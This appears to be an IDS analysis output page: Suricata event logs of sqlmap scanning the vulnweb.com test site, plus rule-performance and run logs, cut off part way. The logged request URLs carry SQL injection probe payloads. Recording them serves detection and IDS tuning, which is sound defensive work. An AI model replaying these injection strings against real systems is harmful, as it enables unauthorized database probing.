{"timestamp":"2018-11-16T10:17:49.786283+0000","flow_id":1509700756351997,"pcap_cnt":78,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43754,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":15382},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":15382,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.794678+0000","flow_id":291867074506174,"pcap_cnt":80,"event_type":"http","src_ip":"192.168.5.137","src_port":43756,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=4293","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.817922+0000","flow_id":291867074506174,"pcap_cnt":86,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43756,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=4293","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.824392+0000","flow_id":2235421380365885,"pcap_cnt":88,"event_type":"http","src_ip":"192.168.5.137","src_port":43758,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1.%27%28%22.%28%2C%2C%28%2C","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.847478+0000","flow_id":2235421380365885,"pcap_cnt":94,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43758,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1.%27%28%22.%28%2C%2C%28%2C","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.856755+0000","flow_id":2238419267568878,"pcap_cnt":96,"event_type":"http","src_ip":"192.168.5.137","src_port":43764,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%27yOuEbg%3C%27%22%3EsEWEcs","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.893641+0000","flow_id":2238419267568878,"pcap_cnt":100,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43764,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%27yOuEbg%3C%27%22%3EsEWEcs","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.930465+0000","flow_id":1140844670076496,"pcap_cnt":104,"event_type":"http","src_ip":"192.168.5.137","src_port":43766,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%29%20AND%206404%3D5435%20AND%20%283555%3D3555","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.953477+0000","flow_id":1140844670076496,"pcap_cnt":110,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43766,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%29%20AND%206404%3D5435%20AND%20%283555%3D3555","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.958573+0000","flow_id":1281831266502690,"pcap_cnt":112,"event_type":"http","src_ip":"192.168.5.137","src_port":43768,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%29%20AND%202455%3D2455%20AND%20%286838%3D6838","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:49.981749+0000","flow_id":1281831266502690,"pcap_cnt":118,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43768,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%29%20AND%202455%3D2455%20AND%20%286838%3D6838","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:49.987305+0000","flow_id":1743325502492513,"pcap_cnt":120,"event_type":"http","src_ip":"192.168.5.137","src_port":43770,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%206116%3D3751","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.011018+0000","flow_id":1743325502492513,"pcap_cnt":125,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43770,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%206116%3D3751","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.614175+0000","flow_id":327747231411215,"pcap_cnt":143,"event_type":"http","src_ip":"192.168.5.137","src_port":43772,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%202455%3D2455","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.637670+0000","flow_id":327747231411215,"pcap_cnt":144,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43772,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%202455%3D2455","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":15434},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":15434,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.668673+0000","flow_id":1445521060097630,"pcap_cnt":148,"event_type":"http","src_ip":"192.168.5.137","src_port":43774,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%201069%3D8014","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.691957+0000","flow_id":1445521060097630,"pcap_cnt":154,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43774,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%201069%3D8014","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.701186+0000","flow_id":2111597473296823,"pcap_cnt":156,"event_type":"http","src_ip":"192.168.5.137","src_port":43776,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHR%2870%29%26CHR%28117%29%26CHR%28101%29%26CHR%28118%29%20FROM%20MSysAccessObjects%29%3D%27Fuev%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.724139+0000","flow_id":2111597473296823,"pcap_cnt":162,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43776,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHR%2870%29%26CHR%28117%29%26CHR%28101%29%26CHR%28118%29%20FROM%20MSysAccessObjects%29%3D%27Fuev%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.731882+0000","flow_id":1924195165286807,"pcap_cnt":164,"event_type":"http","src_ip":"192.168.5.137","src_port":43778,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHR%2867%29%7C%7CCHR%2871%29%7C%7CCHR%28113%29%7C%7CCHR%2872%29%20FROM%20SYSIBM.SYSDUMMY1%29%3D%27CGqH%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.755472+0000","flow_id":1924195165286807,"pcap_cnt":170,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43778,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHR%2867%29%7C%7CCHR%2871%29%7C%7CCHR%28113%29%7C%7CCHR%2872%29%20FROM%20SYSIBM.SYSDUMMY1%29%3D%27CGqH%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.759717+0000","flow_id":1957764629721073,"pcap_cnt":172,"event_type":"http","src_ip":"192.168.5.137","src_port":43780,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20%27exuE%27%20FROM%20RDB%24DATABASE%29%3D%27exuE%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.782597+0000","flow_id":1957764629721073,"pcap_cnt":177,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43780,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20%27exuE%27%20FROM%20RDB%24DATABASE%29%3D%27exuE%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.788739+0000","flow_id":776661508190747,"pcap_cnt":180,"event_type":"http","src_ip":"192.168.5.137","src_port":43782,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHAR%28104%29%7C%7CCHAR%28120%29%7C%7CCHAR%28105%29%7C%7CCHAR%28104%29%29%3D%27hxih%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html"}}
{"timestamp":"2018-11-16T10:17:50.811936+0000","flow_id":776661508190747,"pcap_cnt":185,"event_type":"fileinfo","src_ip":"5.175.17.140","src_port":80,"dest_ip":"192.168.5.137","dest_port":43782,"proto":"TCP","http":{"hostname":"testasp.vulnweb.com","url":"\/showforum.asp?id=1%20AND%20%28SELECT%20CHAR%28104%29%7C%7CCHAR%28120%29%7C%7CCHAR%28105%29%7C%7CCHAR%28104%29%29%3D%27hxih%27","http_user_agent":"sqlmap\/1.2.11.9#dev (http:\/\/sqlmap.org)","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":500,"length":1208},"app_proto":"http","fileinfo":{"filename":"\/showforum.asp","gaps":false,"state":"CLOSED","stored":false,"size":1208,"tx_id":0}}
{"timestamp":"2018-11-16T10:17:50.817622+0000","flow_id":1504117299016712,"pcap_cnt":187,"event_type":"http","src_ip":"192.168.5.137","src_port":43784,"dest_ip":"5.175.17.140","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"

This file has been truncated. Go here to download in full.


keyword_perf.log - (6957 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 11/16/2018 -- 10:19:31
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             5209951         1527            1527            103405          3411.00         3411.00         0.00           
  content          6301287         1655            793             53100           3807.00         3728.00         3880.00        
  pcre             1543913         291             0               77571           5305.00         0.00            5305.00        
  urilen           3673            1               1               3673            3673.00         3673.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             5209951         1527            1527            103405          3411.00         3411.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          2017034         450             180             49853           4482.00         3903.00         4868.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1568432         421             292             53100           3725.00         3642.00         3912.00        
  pcre             1543913         291             0               77571           5305.00         0.00            5305.00        
  urilen           3673            1               1               3673            3673.00         3673.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          123432          35              0               14350           3526.00         0.00            3526.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          133156          35              0               5500            3804.00         0.00            3804.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          843644          250             160             33450           3374.00         3693.00         2807.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1473318         429             126             35735           3434.00         3627.00         3354.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          142271          35              35              34664           4064.00         4064.00         0.00           


suricata-4.0.0-etopen-all-perf.txt-2018-11-16-T-10-19-31-11162018.1019-sqlmap.pcap.txt - (7383 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
  --------------------------------------------------------------------------
  Date: 11/16/2018 -- 10:19:31. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2021118      1        3        4439911      8.29   126      0        502276      35237.39    0.00        35237.39   
  2        2017552      1        6        8461661      15.80  448      0        430216      18887.64    0.00        18887.64   
  3        2016537      1        2        5475153      10.22  322      0        396133      17003.58    0.00        17003.58   
  4        2021214      1        2        3856271      7.20   126      0        238301      30605.33    0.00        30605.33   
  5        2024771      1        1        5211848      9.73   333      0        125506      15651.20    0.00        15651.20   
  6        2012612      1        16       1334262      2.49   51       0        123386      26162.00    0.00        26162.00   
  7        2022074      1        3        1363842      2.55   39       0        115188      34970.31    0.00        34970.31   
  8        2021407      1        4        552980       1.03   126      0        109071      4388.73     0.00        4388.73    
  9        2100540      1        12       852988       1.59   250      0        90072       3411.95     0.00        3411.95    
  10       2010525      1        4        4278474      7.99   180      0        77553       23769.30    0.00        23769.30   
  11       2020295      1        6        3762635      7.02   126      0        73663       29862.18    0.00        29862.18   
  12       2011037      1        5        190731       0.36   41       0        72967       4651.98     0.00        4651.98    
  13       2008420      1        4        1013777      1.89   252      0        72479       4022.92     0.00        4022.92    
  14       2022502      1        4        2872998      5.36   126      0        63678       22801.57    0.00        22801.57   
  15       2012707      1        5        849443       1.59   35       0        57708       24269.80    0.00        24269.80   
  16       2100540      1        12       848555       1.58   250      0        52890       3394.22     0.00        3394.22    
  17       2010524      1        3        823814       1.54   180      0        50239       4576.74     0.00        4576.74    
  18       2006446      1        12       306520       0.57   93       0        43868       3295.91     0.00        3295.91    
  19       2010963      1        6        312887       0.58   93       0        43456       3364.38     0.00        3364.38    
  20       2023316      1        2        399552       0.75   124      0        40378       3222.19     0.00        3222.19    
  21       2018407      1        9        39972        0.07   1        0        39972       39972.00    0.00        39972.00   
  22       2009985      1        2        619316       1.16   186      0        39056       3329.66     0.00        3329.66    
  23       2010513      1        5        181627       0.34   35       0        38458       5189.34     0.00        5189.34    
  24       2010284      1        4        306030       0.57   93       0        36641       3290.65     0.00        3290.65    
  25       2102523      1        8        454829       0.85   129      0        31962       3525.81     0.00        3525.81    
  26       2010285      1        6        302645       0.57   93       0        27295       3254.25     0.00        3254.25    
  27       2010966      1        3        419013       0.78   126      0        27281       3325.50     0.00        3325.50    
  28       2024513      1        5        389090       0.73   125      0        26134       3112.72     0.00        3112.72    
  29       2008175      1        5        140145       0.26   39       0        25812       3593.46     0.00        3593.46    
  30       2013791      1        2        139694       0.26   40       0        23637       3492.35     0.00        3492.35    
  31       2008538      1        7        413161       0.77   126      0        23488       3279.06     0.00        3279.06    
  32       2025113      1        2        23388        0.04   1        0        23388       23388.00    0.00        23388.00   
  33       2015872      1        6        22508        0.04   1        0        22508       22508.00    0.00        22508.00   
  34       2018067      1        3        431412       0.81   126      0        21393       3423.90     0.00        3423.90    
  35       2011042      1        3        285550       0.53   93       0        17412       3070.43     0.00        3070.43    
  36       2016112      1        3        115996       0.22   35       0        10327       3314.17     0.00        3314.17    
  37       2009981      1        2        536624       1.00   186      0        5126        2885.08     0.00        2885.08    
  38       2006445      1        13       285496       0.53   93       0        4612        3069.85     0.00        3069.85    
  39       2102523      1        8        368446       0.69   129      0        4351        2856.17     0.00        2856.17    
  40       2014352      1        3        205804       0.38   68       0        4306        3026.53     0.00        3026.53    
  41       2016948      1        2        267334       0.50   90       0        4214        2970.38     0.00        2970.38    
  42       2010515      1        6        110436       0.21   35       0        4163        3155.31     0.00        3155.31    
  43       2014890      1        2        118238       0.22   40       0        4031        2955.95     0.00        2955.95    
  44       2101379      1        13       3710         0.01   1        0        3710        3710.00     0.00        3710.00    
  45       2014704      1        7        139053       0.26   48       0        3584        2896.94     0.00        2896.94    
  46       2017808      1        2        6639         0.01   2        0        3553        3319.50     0.00        3319.50    
  47       2009714      1        7        3492         0.01   1        0        3492        3492.00     0.00        3492.00    
  48       2101634      1        15       3319         0.01   1        0        3319        3319.00     0.00        3319.00    
  49       2009815      1        5        3299         0.01   1        0        3299        3299.00     0.00        3299.00    
  50       2101621      1        12       6008         0.01   2        0        3216        3004.00     0.00        3004.00    
  51       2102110      1        4        3206         0.01   1        0        3206        3206.00     0.00        3206.00    
  52       2010967      1        3        3183         0.01   1        0        3183        3183.00     0.00        3183.00    
  53       2101972      1        18       5327         0.01   2        0        2752        2663.50     0.00        2663.50    
  54       2100356      1        7        2555         0.00   1        0        2555        2555.00     0.00        2555.00    


IDSDeathBlossom.py.log - (1149 bytes) - download
1
2
3
4
5
6
7
8
2018-11-16 10:19:20,630 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2018-11-16 10:19:21,440 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2018-11-16 10:19:21,440 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etopen-all
2018-11-16 10:19:21,441 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2018-11-16 10:19:21,441 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2018-11-16 10:19:21,441 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/c8027fddb943c33d197316babb1cbf5ed2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/11162018.1019-sqlmap.pcap -vvv -k none
2018-11-16 10:19:31,137 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2018-11-16 10:19:31,138 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 10.5164849758